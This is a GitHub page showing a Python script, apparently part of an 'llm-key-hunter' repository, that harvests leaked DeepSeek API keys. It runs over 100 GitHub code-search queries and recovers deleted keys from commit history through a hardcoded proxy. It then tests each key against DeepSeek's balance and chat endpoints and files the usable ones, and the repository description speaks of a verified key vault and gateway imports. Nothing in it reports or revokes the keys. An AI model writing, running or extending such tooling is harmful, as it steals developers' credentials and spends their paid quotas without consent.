- tools/scripts/llm-key-hunter: GitHub leak hunting pipeline (hunt_*, pivot miner, two-layer verify/content caches, per-provider verification) - usable_keys: verified key vault across 12 providers (deepseek, minimax, volcanoark, longcat, codingplan, zhipu free-tier, mimo, siliconflow, etc.) - .grok/skills/llm-key-hunter: operator skill for the hunt/verify/vault flow - NewAPI channel import scripts and CDP capture helpers - Result verdict buckets (excluding multi-GB blob caches and dedup dumps)
476 lines
22 KiB
Python
476 lines
22 KiB
Python
#!/usr/bin/env python3
|
|
"""DeepSeek deep-miner v2.
|
|
|
|
Over v1:
|
|
- Far broader search queries (more languages, file types, env-var spellings,
|
|
base_url / openai-compat patterns, k8s/docker/CI, Chinese terms, READMEs).
|
|
- Optional per-file commit-history scan (Stage 2c) to recover keys deleted in
|
|
prior commits, bounded per file. Uses the core API (--max-commits).
|
|
- Incremental candidate/key checkpoints so a killed run resumes.
|
|
|
|
Classification: only HTTP 401 => DEAD. Verify order balance -> chat -> reasoner.
|
|
Outputs results/deepseek_v2/.
|
|
"""
|
|
import argparse, json, os, re, subprocess, sys, time
|
|
import urllib.request, urllib.error, urllib.parse
|
|
from concurrent.futures import ThreadPoolExecutor, as_completed
|
|
from pathlib import Path
|
|
|
|
sys.path.insert(0, str(Path(__file__).resolve().parent))
|
|
from verify_cache import CachedVerifier
|
|
from content_cache import ContentCache, parse_raw_url
|
|
|
|
HERE = Path(__file__).parent
|
|
RESULTS_DIR = HERE / "results" / "deepseek_v2"
|
|
RESULTS_DIR.mkdir(parents=True, exist_ok=True)
|
|
EXTRACTED_FILE = RESULTS_DIR / "extracted_keys.txt"
|
|
CANDIDATES_FILE = RESULTS_DIR / "candidates.txt"
|
|
GLOBAL_EXTRACTED = HERE / "results" / "extracted_keys.txt"
|
|
|
|
UA = "curl/8.5.0"
|
|
BASE = "https://api.deepseek.com"
|
|
GH_PROXY = os.environ.get("GH_PROXY", "http://114.111.19.228:3389")
|
|
|
|
_gh_opener = None
|
|
def gh_opener():
|
|
global _gh_opener
|
|
if _gh_opener is None:
|
|
if GH_PROXY:
|
|
h = urllib.request.ProxyHandler({"http": GH_PROXY, "https": GH_PROXY})
|
|
_gh_opener = urllib.request.build_opener(h)
|
|
else:
|
|
_gh_opener = urllib.request.build_opener()
|
|
return _gh_opener
|
|
|
|
_direct_opener = None
|
|
def direct_opener():
|
|
global _direct_opener
|
|
if _direct_opener is None:
|
|
_direct_opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
|
|
return _direct_opener
|
|
|
|
KEY_RE = re.compile(r"sk-[a-f0-9]{32}")
|
|
BLACKLIST = (
|
|
"00000000000000000000000000000000","1234567890abcdef1234567890abcdef",
|
|
"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx","your-","example","placeholder","test-key",
|
|
)
|
|
|
|
# Direct (no proxy) for DeepSeek verification; proxy for GitHub.
|
|
def http_request(method, path, key, body=None, timeout=30):
|
|
url = f"{BASE}{path}"
|
|
h = {"User-Agent": UA, "Accept": "*/*", "Authorization": f"Bearer {key}"}
|
|
data = None
|
|
if body is not None:
|
|
data = json.dumps(body).encode(); h["Content-Type"] = "application/json"
|
|
req = urllib.request.Request(url, data=data, headers=h, method=method)
|
|
try:
|
|
with direct_opener().open(req, timeout=timeout) as resp:
|
|
return resp.getcode(), resp.read().decode("utf-8","replace")
|
|
except urllib.error.HTTPError as e:
|
|
try: return e.code, e.read().decode("utf-8","replace")
|
|
except Exception: return e.code, ""
|
|
except Exception as e:
|
|
return 0, f"network: {type(e).__name__}: {e}"
|
|
|
|
def classify_balance(code, body):
|
|
if code == 200:
|
|
try:
|
|
d = json.loads(body); bal = d.get("balance_infos") or []
|
|
if bal:
|
|
total = 0.0
|
|
for b in bal:
|
|
try: total += float(b.get("total_balance",0))
|
|
except (TypeError,ValueError): pass
|
|
if total > 0: return "USABLE", f"balance: \u00a5{total:.4f} {bal[0].get('currency','')}"
|
|
return "NO_BALANCE","balance: 0"
|
|
if d.get("is_available") is True: return "USABLE","balance: available"
|
|
if d.get("is_available") is False: return "NO_BALANCE","balance: unavailable"
|
|
return "USABLE", f"balance: {body[:120]}"
|
|
except json.JSONDecodeError:
|
|
return "USABLE", f"balance: {body[:120]}"
|
|
if code in (402,429): return "NO_BALANCE", f"bal HTTP {code}: {body[:140]}"
|
|
if code == 401: return "DEAD","401 unauthorized"
|
|
if code == 0: return "UNKNOWN", body[:160]
|
|
return "NO_ACCESS", f"bal HTTP {code}: {body[:140]}"
|
|
|
|
def classify_chat(code, body):
|
|
bl = (body or "").lower()
|
|
if code == 200:
|
|
if '"choices"' in bl or '"id"' in bl: return "USABLE","chat 200 OK"
|
|
if any(x in bl for x in ("balance","quota","arrearage","insufficient")):
|
|
return "NO_BALANCE", f"chat: {body[:120]}"
|
|
return "USABLE", f"chat: {body[:120]}"
|
|
if code in (402,429): return "NO_BALANCE", f"chat HTTP {code}: {body[:140]}"
|
|
if code == 401: return "DEAD","chat 401"
|
|
if code == 0: return "UNKNOWN", body[:160]
|
|
return "NO_ACCESS", f"chat HTTP {code}: {body[:140]}"
|
|
|
|
RANK = {"USABLE":4,"NO_BALANCE":3,"NO_ACCESS":2,"UNKNOWN":1,"DEAD":0}
|
|
|
|
def verify_key(key):
|
|
best, best_detail = "DEAD", ""
|
|
code, body = http_request("GET","/user/balance",key)
|
|
v,d = classify_balance(code,body)
|
|
if RANK[v] > RANK[best]: best,best_detail = v,d
|
|
if best == "USABLE": return best,best_detail
|
|
for model in ("deepseek-chat","deepseek-reasoner"):
|
|
code,body = http_request("POST","/v1/chat/completions",key,body={
|
|
"model":model,"messages":[{"role":"user","content":"hi"}],"max_tokens":1})
|
|
v,d = classify_chat(code,body); d = f"[{model}] {d}"
|
|
if RANK[v] > RANK[best]: best,best_detail = v,d
|
|
if best == "USABLE": return best,best_detail
|
|
return best,best_detail
|
|
|
|
def valid_key(k):
|
|
if not KEY_RE.fullmatch(k): return False
|
|
low = k.lower()
|
|
return not any(b in low for b in BLACKLIST)
|
|
|
|
SEARCH_QUERIES = [
|
|
# env-var spellings
|
|
'"DEEPSEEK_API_KEY" extension:env', '"DEEPSEEK_KEY" extension:env',
|
|
'"DEEPSEEK_TOKEN" extension:env', '"DEEPSEEK_API_KEY" filename:.env',
|
|
'"DEEPSEEK_API_KEY" extension:env.example', '"DEEPSEEK_API_KEY" extension:env.local',
|
|
# config files by extension
|
|
'"DEEPSEEK_API_KEY" extension:yaml', '"DEEPSEEK_API_KEY" extension:yml',
|
|
'"DEEPSEEK_API_KEY" extension:json', '"DEEPSEEK_API_KEY" extension:toml',
|
|
'"DEEPSEEK_API_KEY" extension:ini', '"DEEPSEEK_API_KEY" extension:cfg',
|
|
'"DEEPSEEK_API_KEY" extension:conf', '"DEEPSEEK_API_KEY" extension:properties',
|
|
'"DEEPSEEK_API_KEY" extension:env',
|
|
# more languages
|
|
'"DEEPSEEK_API_KEY" extension:py', '"DEEPSEEK_API_KEY" extension:ipynb',
|
|
'"DEEPSEEK_API_KEY" extension:js', '"DEEPSEEK_API_KEY" extension:ts',
|
|
'"DEEPSEEK_API_KEY" extension:go', '"DEEPSEEK_API_KEY" extension:java',
|
|
'"DEEPSEEK_API_KEY" extension:kt', '"DEEPSEEK_API_KEY" extension:rb',
|
|
'"DEEPSEEK_API_KEY" extension:php', '"DEEPSEEK_API_KEY" extension:cs',
|
|
'"DEEPSEEK_API_KEY" extension:rs', '"DEEPSEEK_API_KEY" extension:swift',
|
|
'"DEEPSEEK_API_KEY" extension:dart', '"DEEPSEEK_API_KEY" extension:ex',
|
|
'"DEEPSEEK_API_KEY" extension:exs', '"DEEPSEEK_API_KEY" extension:scala',
|
|
'"DEEPSEEK_API_KEY" extension:sh',
|
|
# api.deepseek.com in code
|
|
'"api.deepseek.com" extension:py', '"api.deepseek.com" extension:js',
|
|
'"api.deepseek.com" extension:ts', '"api.deepseek.com" extension:go',
|
|
'"api.deepseek.com" extension:java', '"api.deepseek.com" extension:php',
|
|
'"api.deepseek.com" extension:rb', '"api.deepseek.com" extension:cs',
|
|
'"api.deepseek.com" extension:rs', '"api.deepseek.com" extension:json',
|
|
'"api.deepseek.com" extension:yaml', '"api.deepseek.com" extension:yml',
|
|
'"api.deepseek.com/v1"', '"api.deepseek.com/v1/chat/completions"',
|
|
'"api.deepseek.com" bearer sk-', '"https://api.deepseek.com" "sk-"',
|
|
# model strings with keys
|
|
'"deepseek-chat" "sk-"', '"deepseek-reasoner" "sk-"',
|
|
'"deepseek-chat" "api_key"', '"deepseek-reasoner" "api_key"',
|
|
'"deepseek-chat" Authorization: Bearer sk-',
|
|
'"deepseek-reasoner" Authorization: Bearer sk-',
|
|
# direct assignment
|
|
'DEEPSEEK_API_KEY=sk-', 'DEEPSEEK_KEY=sk-', 'DEEPSEEK_TOKEN=sk-',
|
|
'deepseek_api_key=sk-', 'DeepSeek_API_KEY=sk-', 'deepseekToken=sk-',
|
|
'deepseek_api_secret=sk-', 'DEEPSEEK_API_SECRET=sk-',
|
|
# openai-compat / base_url
|
|
'"base_url" "api.deepseek.com" extension:py',
|
|
'"base_url" "https://api.deepseek.com"',
|
|
'"base_url" "api.deepseek.com" extension:js',
|
|
'"api.deepseek.com" "OPENAI_API_KEY"',
|
|
'"api.deepseek.com" filename:.env', 'deepseek "base_url" filename:.env',
|
|
# config filenames
|
|
'deepseek "sk-" filename:config.json', 'deepseek "sk-" filename:config.toml',
|
|
'deepseek "sk-" filename:config.yaml', 'deepseek "sk-" filename:config.yml',
|
|
'deepseek "sk-" filename:config.py', 'deepseek "sk-" filename:settings.py',
|
|
'deepseek "sk-" filename:local.settings.json',
|
|
'deepseek "sk-" filename:application.yml',
|
|
'deepseek "sk-" filename:application.properties',
|
|
'deepseek "sk-" filename:secrets.yaml', 'deepseek "sk-" filename:secrets.yml',
|
|
# docker / k8s / CI
|
|
'"DEEPSEEK_API_KEY" filename:docker-compose',
|
|
'"DEEPSEEK_API_KEY" filename:Dockerfile',
|
|
'"DEEPSEEK_API_KEY" path:.github',
|
|
'"DEEPSEEK_API_KEY" path:.gitlab',
|
|
'"DEEPSEEK_API_KEY" filename:.gitlab-ci',
|
|
'"api.deepseek.com" filename:values.yaml',
|
|
'"api.deepseek.com" filename:deployment.yaml',
|
|
'"api.deepseek.com" filename:configmap',
|
|
# generic .env with deepseek
|
|
'deepseek "sk-" filename:.env', 'deepseek-chat filename:.env',
|
|
'deepseek-reasoner filename:.env', '"deepseek/v1" filename:.env',
|
|
# SDK / client init
|
|
'DeepSeek(api_key=sk-', 'OpenAI(api_key=sk- "api.deepseek.com"',
|
|
'deepseek.DeepSeek sk-', 'new DeepSeek sk-',
|
|
# Chinese terms / docs / README
|
|
'"deepseek" "sk-" extension:md', '"deepseek" "api_key" extension:md',
|
|
'deepseek "sk-" filename:README', '"DEEPSEEK_API_KEY" filename:README',
|
|
'deepseek "\u7834\u89e3" sk-', 'deepseek "\u514d\u8d39" sk-',
|
|
# proxy/gateway projects that embed upstream keys
|
|
'"DEEPSEEK_API_KEY" filename:docker-compose.yml',
|
|
'"deepseek" "sk-" filename:docker-compose',
|
|
'"deepseek" "sk-" filename:.env.example',
|
|
# one-api / new-api style channel configs
|
|
'"deepseek" "sk-" filename:渠道', '"deepseek" "key" filename:channels',
|
|
# broader bare key near deepseek
|
|
'deepseek sk-[a-f0-9]', '"sk-" "deepseek-chat" extension:py',
|
|
]
|
|
|
|
def github_token():
|
|
tok = os.environ.get("GITHUB_TOKEN") or os.environ.get("GH_TOKEN")
|
|
if tok: return tok
|
|
try:
|
|
out = subprocess.run(["gh","auth","token"],capture_output=True,text=True,timeout=10)
|
|
if out.returncode == 0: return out.stdout.strip()
|
|
except FileNotFoundError: pass
|
|
hosts = Path.home()/".config"/"gh"/"hosts.yml"
|
|
if hosts.exists():
|
|
for line in hosts.read_text().splitlines():
|
|
line=line.strip()
|
|
if line.startswith("oauth_token:"): return line.split(":",1)[1].strip()
|
|
return None
|
|
|
|
def gh_api(url, token, wants_json=True):
|
|
headers = {"Accept":"application/vnd.github+json","User-Agent":"key-hunter"}
|
|
if token: headers["Authorization"]=f"Bearer {token}"
|
|
req = urllib.request.Request(url, headers=headers)
|
|
for attempt in range(6):
|
|
try:
|
|
with gh_opener().open(req, timeout=30) as resp:
|
|
raw = resp.read()
|
|
return json.loads(raw) if wants_json else raw
|
|
except urllib.error.HTTPError as e:
|
|
if e.code in (403,429):
|
|
reset = e.headers.get("X-RateLimit-Reset")
|
|
wait = max(int(reset)-int(time.time()),5) if reset else 30
|
|
print(f" rate-limited, waiting {wait}s...", file=sys.stderr)
|
|
time.sleep(wait+1); continue
|
|
if e.code == 422: return None
|
|
e.read()
|
|
return None
|
|
except Exception as e:
|
|
print(f" network: {e}", file=sys.stderr); time.sleep(3)
|
|
return None
|
|
|
|
def gh_search(query, token, per_page=100, max_pages=10):
|
|
for page in range(1, max_pages+1):
|
|
url = ("https://api.github.com/search/code"
|
|
f"?q={urllib.parse.quote(query)}&per_page={per_page}&page={page}")
|
|
data = gh_api(url, token)
|
|
if not data: return
|
|
items = data.get("items",[])
|
|
if not items: return
|
|
for it in items: yield it
|
|
if len(items) < per_page: return
|
|
time.sleep(2.2 if token else 7)
|
|
|
|
def to_raw_url(html_url):
|
|
return html_url.replace("github.com","raw.githubusercontent.com").replace("/blob/","/")
|
|
|
|
def split_html_url(html_url):
|
|
# https://github.com/owner/repo/blob/sha/path
|
|
try:
|
|
m = re.match(r"https://github\.com/([^/]+/[^/]+)/blob/([^/]+)/(.*)", html_url)
|
|
if m: return m.group(1), m.group(2), m.group(3)
|
|
except Exception: pass
|
|
return None,None,None
|
|
|
|
def fetch_raw(url):
|
|
req = urllib.request.Request(url, headers={"User-Agent":"Mozilla/5.0"})
|
|
try:
|
|
with gh_opener().open(req, timeout=20) as resp:
|
|
return resp.read().decode("utf-8","replace")
|
|
except Exception:
|
|
return ""
|
|
|
|
def make_cached_fetch(cc, fetcher=fetch_raw):
|
|
"""fetch_raw replacement served by ContentCache (immutable blob SHA)."""
|
|
def cached(url):
|
|
repo, sha, path = parse_raw_url(url)
|
|
if repo and sha and path:
|
|
txt = cc.get(repo, path, sha)
|
|
if txt is not None:
|
|
return txt
|
|
txt = fetcher(url)
|
|
if txt:
|
|
cc.put(repo, path, sha, txt)
|
|
return txt
|
|
return fetcher(url)
|
|
return cached
|
|
|
|
def list_file_commits(repo, path, token, max_commits=3):
|
|
"""List commit SHAs touching a file (core API, 1 per page*path). Bounded."""
|
|
shas = []
|
|
url = ("https://api.github.com/repos/"+repo+"/commits"
|
|
f"?path={urllib.parse.quote(path)}&per_page={max_commits}")
|
|
data = gh_api(url, token)
|
|
if not data: return shas
|
|
for c in data:
|
|
try: shas.append(c["sha"])
|
|
except Exception: pass
|
|
return shas
|
|
|
|
def fetch_commit_file(repo, sha, path, token):
|
|
"""Fetch file content at a given commit via raw.githubusercontent."""
|
|
url = f"https://raw.githubusercontent.com/{repo}/{sha}/{path}"
|
|
return fetch_raw(url)
|
|
|
|
def extract_keys(text, keys, src):
|
|
n = 0
|
|
for k in KEY_RE.findall(text or ""):
|
|
if valid_key(k) and k not in keys:
|
|
keys[k] = src; n += 1
|
|
return n
|
|
|
|
def main():
|
|
ap = argparse.ArgumentParser()
|
|
ap.add_argument("--verify-only", action="store_true")
|
|
ap.add_argument("--workers", type=int, default=20)
|
|
ap.add_argument("--commit-workers", type=int, default=10)
|
|
ap.add_argument("--max-commits", type=int, default=0,
|
|
help="per-file commit history depth (0 disables Stage 2c)")
|
|
ap.add_argument("--limit", type=int, default=0)
|
|
ap.add_argument("--no-cache", action="store_true",
|
|
help="ignore verification cache")
|
|
ap.add_argument("--no-content-cache", action="store_true",
|
|
help="ignore raw file content cache (always re-crawl)")
|
|
ap.add_argument("--resume-search", action="store_true",
|
|
help="load candidate files from candidates.txt checkpoint")
|
|
args = ap.parse_args()
|
|
|
|
keys = {}
|
|
if GLOBAL_EXTRACTED.exists():
|
|
for line in GLOBAL_EXTRACTED.read_text().splitlines():
|
|
if not line.startswith("DeepSeek|"): continue
|
|
parts = line.split("|",3)
|
|
if len(parts) >= 3 and valid_key(parts[1]):
|
|
keys[parts[1]] = parts[2]
|
|
# also merge v1 extracted
|
|
v1 = HERE/"results"/"deepseek_deep"/"extracted_keys.txt"
|
|
if v1.exists():
|
|
for line in v1.read_text().splitlines():
|
|
p = line.split("|",1)
|
|
if p and valid_key(p[0]): keys.setdefault(p[0], p[1] if len(p)>1 else "v1")
|
|
print(f"loaded {len(keys)} previously-known DeepSeek keys")
|
|
|
|
candidates = {}
|
|
if args.resume_search and CANDIDATES_FILE.exists():
|
|
for line in CANDIDATES_FILE.read_text().splitlines():
|
|
if "|" in line:
|
|
u,r = line.split("|",1); candidates[u]=r
|
|
print(f"resumed {len(candidates)} candidates from checkpoint")
|
|
|
|
if not args.verify_only:
|
|
token = github_token()
|
|
print(f"GitHub token: {'yes' if token else 'NO'}\n")
|
|
|
|
print("=== Stage 1: code search ===")
|
|
for i,q in enumerate(SEARCH_QUERIES,1):
|
|
print(f" [{i:3d}/{len(SEARCH_QUERIES)}] {q}")
|
|
try:
|
|
for it in gh_search(q, token):
|
|
u = it.get("html_url","")
|
|
if u and u not in candidates:
|
|
candidates[u] = it.get("repository",{}).get("full_name","?")
|
|
except Exception as e:
|
|
print(f" error: {e}", file=sys.stderr)
|
|
if i % 10 == 0:
|
|
with open(CANDIDATES_FILE,"w") as f:
|
|
for u,r in candidates.items(): f.write(f"{u}|{r}\n")
|
|
with open(CANDIDATES_FILE,"w") as f:
|
|
for u,r in candidates.items(): f.write(f"{u}|{r}\n")
|
|
print(f" candidate files: {len(candidates)}")
|
|
|
|
print("\n=== Stage 2a: fetch HEAD raw & extract ===")
|
|
fetched=new=0
|
|
with ContentCache(force=getattr(args,"no_content_cache",False)) as cc:
|
|
cfetch = make_cached_fetch(cc)
|
|
with ThreadPoolExecutor(max_workers=20) as pool:
|
|
futs = {pool.submit(cfetch, to_raw_url(u)): u for u in candidates}
|
|
for fut in as_completed(futs):
|
|
u=futs[fut]; fetched+=1
|
|
try: content=fut.result()
|
|
except Exception: content=""
|
|
new += extract_keys(content, keys, u)
|
|
if fetched % 200 == 0:
|
|
print(f" {fetched}/{len(candidates)} keys={len(keys)} new={new} "
|
|
f"cache={cc.hits}hit/{cc.misses}fetch")
|
|
with open(EXTRACTED_FILE,"w") as f:
|
|
for k,s in sorted(keys.items()): f.write(f"{k}|{s}\n")
|
|
st=cc.stats()
|
|
print(f" content cache: {st['hits']} hits, {st['misses']} fetched "
|
|
f"({st['bytes_served']} bytes from cache)")
|
|
print(f" after HEAD: {len(keys)} keys ({new} new)")
|
|
|
|
if args.max_commits > 0 and token:
|
|
print(f"\n=== Stage 2c: per-file commit history (depth {args.max_commits}) ===")
|
|
repo_paths = {}
|
|
for u in candidates:
|
|
repo,sha,path = split_html_url(u)
|
|
if repo and path: repo_paths.setdefault(repo,set()).add(path)
|
|
tasks = []
|
|
for repo, paths in repo_paths.items():
|
|
for path in paths: tasks.append((repo,path))
|
|
print(f" {len(tasks)} (repo,path) pairs across {len(repo_paths)} repos")
|
|
done=0
|
|
with ContentCache(force=getattr(args,"no_content_cache",False)) as cc:
|
|
cfetch = make_cached_fetch(cc)
|
|
def job(rp):
|
|
repo,path = rp
|
|
shas = list_file_commits(repo,path,token,args.max_commits)
|
|
found=[]
|
|
for sha in shas:
|
|
txt = cfetch(f"https://raw.githubusercontent.com/{repo}/{sha}/{path}")
|
|
for k in KEY_RE.findall(txt or ""):
|
|
if valid_key(k): found.append((k,f"https://github.com/{repo}/blob/{sha}/{path}"))
|
|
return found
|
|
with ThreadPoolExecutor(max_workers=args.commit_workers) as pool:
|
|
futs={pool.submit(job,t):t for t in tasks}
|
|
for fut in as_completed(futs):
|
|
done+=1
|
|
try:
|
|
for k,src in fut.result():
|
|
if k not in keys: keys[k]=src; new+=1
|
|
except Exception: pass
|
|
if done % 100 == 0:
|
|
print(f" {done}/{len(tasks)} keys={len(keys)} new={new} "
|
|
f"cache={cc.hits}hit/{cc.misses}fetch")
|
|
with open(EXTRACTED_FILE,"w") as f:
|
|
for k,s in sorted(keys.items()): f.write(f"{k}|{s}\n")
|
|
st=cc.stats()
|
|
print(f" commit content cache: {st['hits']} hits, {st['misses']} fetched")
|
|
print(f" after commits: {len(keys)} keys")
|
|
|
|
with open(EXTRACTED_FILE,"w") as f:
|
|
for k,s in sorted(keys.items()): f.write(f"{k}|{s}\n")
|
|
|
|
if args.limit>0:
|
|
keys=dict(list(keys.items())[:args.limit])
|
|
print(f" (limited to {args.limit})")
|
|
|
|
print(f"\n=== Stage 3: verify {len(keys)} keys (workers={args.workers}) ===")
|
|
buckets={"USABLE":[],"NO_BALANCE":[],"NO_ACCESS":[],"UNKNOWN":[],"DEAD":[]}
|
|
processed=0; start=time.time()
|
|
with CachedVerifier("deepseek", verify_key, force=args.no_cache) as ver:
|
|
with ThreadPoolExecutor(max_workers=args.workers) as pool:
|
|
futs={pool.submit(ver,k):(k,s) for k,s in keys.items()}
|
|
for fut in as_completed(futs):
|
|
k,s=futs[fut]; processed+=1
|
|
try: v,d=fut.result()
|
|
except Exception as e: v,d="UNKNOWN",f"exc: {e}"
|
|
buckets[v].append((k,s,d))
|
|
if processed%100==0:
|
|
el=time.time()-start
|
|
print(f" [{processed:5d}/{len(keys)}] use={len(buckets['USABLE'])} "
|
|
f"nobal={len(buckets['NO_BALANCE'])} noacc={len(buckets['NO_ACCESS'])} "
|
|
f"unk={len(buckets['UNKNOWN'])} dead={len(buckets['DEAD'])} ({processed/el:.1f}/s)")
|
|
print(f" cache: {ver.stats()['hits']} hits, {ver.stats()['live']} live queries")
|
|
el=time.time()-start; print(f"\nDone in {el:.1f}s")
|
|
for name in ("USABLE","NO_BALANCE","NO_ACCESS","UNKNOWN","DEAD"):
|
|
p=RESULTS_DIR/f"{name.lower()}.txt"
|
|
with open(p,"w") as f:
|
|
for k,s,d in sorted(buckets[name]): f.write(f"{k}|{s}|{d}\n")
|
|
print(f" {name:11s}: {len(buckets[name]):5d} -> {p.name}")
|
|
with open(RESULTS_DIR/"all_non_401.txt","w") as f:
|
|
for name in ("USABLE","NO_BALANCE","NO_ACCESS","UNKNOWN"):
|
|
for k,s,d in sorted(buckets[name]): f.write(f"{name}|{k}|{s}|{d}\n")
|
|
if buckets["USABLE"]:
|
|
print("\n=== USABLE KEYS ===")
|
|
for k,s,d in sorted(buckets["USABLE"]):
|
|
print(f" {k}\n src: {s}\n {d}")
|
|
|
|
if __name__ == "__main__":
|
|
main()
|